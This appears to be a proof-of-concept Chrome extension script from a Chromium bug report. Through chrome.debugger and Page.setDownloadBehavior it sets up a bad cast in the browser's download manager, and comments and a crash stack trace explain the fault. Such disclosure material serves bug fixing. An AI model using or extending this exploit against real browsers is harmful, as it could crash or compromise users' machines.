'use strict';

async function attachAndSendCommand(target, command, params) {
    return new Promise(function(resolve) {
        chrome.debugger.attach(target, '1.2', function() {
            chrome.debugger.sendCommand(target, command, params, function() {
                resolve();
            });
        });
    });
}

function runExploit() {
    chrome.tabs.create({
        url: chrome.runtime.getURL('/manifest.json'), // The actual URL does not matter.
    }, async function(tab) {
        var tabDebuggee = { tabId: tab.id };
        // Force use of DevToolsDownloadManagerDelegate for this BrowserContext via
        // https://chromium.googlesource.com/chromium/src/+/9fa5fa7e7c5aa6f67ee721cd4022de491dc255d1/content/browser/devtools/protocol/page_handler.cc#724
        await attachAndSendCommand(tabDebuggee, 'Page.setDownloadBehavior', {
            // (note: it does not matter whether we use "allow" or "deny",
            //  the only thing that matters is that the delegate is initialized).
            behavior: 'deny',
        });

        var a = document.createElement('a');
        a.href = 'data:,whatever';
        a.download = 'whatever.txt';
        //a.click();
        // After triggering the download, a bad cast occurs in the browser.
        // See below for a detailed explanation.
    });
}
runExploit();

// PageHandler::SetDownloadBehavior has initialized a DevToolsDownloadManagerHelper
// for that unrelated new tab, but not the current tab :
// https://chromium.googlesource.com/chromium/src/+/9fa5fa7e7c5aa6f67ee721cd4022de491dc255d1/content/browser/devtools/protocol/page_handler.cc#732
//
// So calls to DevToolsDownloadManagerDelegate::DetermineDownloadTarget are delegated to
// ChromeDownloadManagerDelegate::DetermineDownloadTarget :
// https://chromium.googlesource.com/chromium/src/+/ff4e4bf57b472519927fd4695973e49a12c6081b/content/browser/devtools/protocol/devtools_download_manager_delegate.cc#88
//
// Which calls DownloadTargetDeterminer::Start (and DownloadTargetDeterminer::DoLoop).
// This state machine will eventually transition to STATE_PROMPT_USER_FOR_DOWNLOAD_PATH,
// and run DownloadTargetDeterminer::DoRequestConfirmation.
// And ultimately invoke DownloadFilePicker::DownloadFilePicker :
// https://chromium.googlesource.com/chromium/src/+/85289cec5d51c16ddcceb1cf460c2bdfb980c97e/chrome/browser/download/download_file_picker.cc#59
//
//    DownloadPrefs::FromBrowserContext(item->GetBrowserContext());
//
// The DownloadPrefs::FromBrowserContext method is implemented as follows:
//
//   DownloadPrefs* DownloadPrefs::FromBrowserContext(
//       content::BrowserContext* context) {
//     return FromDownloadManager(BrowserContext::GetDownloadManager(context));
//   }
//
//   DownloadPrefs* DownloadPrefs::FromDownloadManager(
//       DownloadManager* download_manager) {
//     ChromeDownloadManagerDelegate* delegate =
//         static_cast<ChromeDownloadManagerDelegate*>(
//             download_manager->GetDelegate());
//     return delegate->download_prefs();
//   }
//
// download_manager->GetDelegate() is cast from content::DownloadManagerDelegate* to
// ChromeDownloadManagerDelegate*. But it is actually a DevToolsDownloadManagerDelegate* !
// (as set up in DevToolsDownloadManagerDelegate::TakeOver).
//
// The browser crashes and the stack trace is:
// Received signal 11 SEGV_MAPERR ffffdc88cbcbe60e
// #0 0x55655ca92b77 base::debug::StackTrace::StackTrace()
// #1 0x55655ca926df base::debug::(anonymous namespace)::StackDumpSignalHandler()
// #2 0x7fca32f17da0 <unknown>
// #3 0x55655db351f7 subtle::PrefMemberBase::VerifyPref()
// #4 0x55655c82a70d DownloadPrefs::PromptForDownload()
// #5 0x55655c848c7d DownloadFilePicker::DownloadFilePicker()
// #6 0x55655c84b0b6 DownloadTargetDeterminer::DoRequestConfirmation()
// #7 0x55655c84a6d3 DownloadTargetDeterminer::DoLoop()
